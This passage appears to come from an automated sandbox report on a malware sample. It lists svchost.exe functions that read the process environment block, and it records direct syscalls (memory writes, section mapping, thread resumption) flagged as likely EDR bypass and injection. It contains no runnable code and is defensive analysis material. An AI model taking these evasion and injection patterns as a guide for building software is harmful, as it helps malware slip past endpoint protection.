Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]	2_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]	2_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]	2_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]	2_2_037EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]	2_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]	2_2_037DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]	2_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]	2_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]	2_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]	2_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]	2_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]	2_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]	2_2_03738BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]	2_2_0375EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_037BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_037DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]	2_2_03750BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]	2_2_03730BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]	2_2_03740BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_037E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]	2_2_03804A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]	2_2_037ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]	2_2_0376CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]	2_2_037DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]	2_2_03736A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]	2_2_03740A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]	2_2_03754A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]	2_2_0376CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]	2_2_0376CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]	2_2_0375EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]	2_2_037BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]	2_2_0376AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]	2_2_03730AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]	2_2_03764AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]	2_2_03786ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]	2_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]	2_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]	2_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]	2_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]	2_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]	2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]	2_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]	2_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]	2_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]	2_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]	2_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]	2_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]	2_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]	2_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]	2_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]	2_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]	2_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038008C0 mov eax, dword ptr fs:[00000030h]	2_2_038008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]	2_2_0376A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]	2_2_037BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_037FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0375E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]	2_2_037BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]	2_2_03730887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]	2_2_037D2F60

Source: C:\Users\user\Desktop\WBI835q8qr.exe

Code function: 0_2_00B780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00B780A9

Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4A124 SetUnhandledExceptionFilter,		0_2_00B4A124
Source: C:\Users\user\Desktop\WBI835q8qr.exe	Code function: 0_2_00B4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00B4A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
